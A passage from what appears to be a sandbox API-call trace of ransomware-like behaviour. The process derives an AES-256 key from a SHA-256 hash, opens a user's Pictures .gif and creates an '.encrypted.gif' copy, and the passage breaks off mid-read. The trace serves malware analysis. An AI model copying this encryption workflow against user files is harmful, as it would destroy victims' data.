lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="phhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hv1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rvP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vP we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="we R.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.323] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.324] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.324] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.324] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.324] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.324] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.324] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.324] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd411ac50, ftCreationTime.dwHighDateTime=0x1d5c012, ftLastAccessTime.dwLowDateTime=0x7e49c540, ftLastAccessTime.dwHighDateTime=0x1d5bd43, ftLastWriteTime.dwLowDateTime=0x7e49c540, ftLastWriteTime.dwHighDateTime=0x1d5bd43, nFileSizeHigh=0x0, nFileSizeLow=0x13ec2, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="phhv1rvP we R.gif", cAlternateFileName="PHHV1R~1.GIF")) returned 0x7c2240 [0041.324] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.324] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.324] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.325] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.325] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0041.325] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.325] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.326] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.326] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.326] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.326] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.326] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.326] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.326] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.327] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0041.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.327] CryptDestroyHash (hHash=0x7c2100) returned 1 [0041.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\phhv1rvp we r.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.327] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.327] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0041.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.327] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.328] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.328] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.329] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\phhv1rvp we r.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0041.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0041.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0041.331] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0041.331] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.332] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, 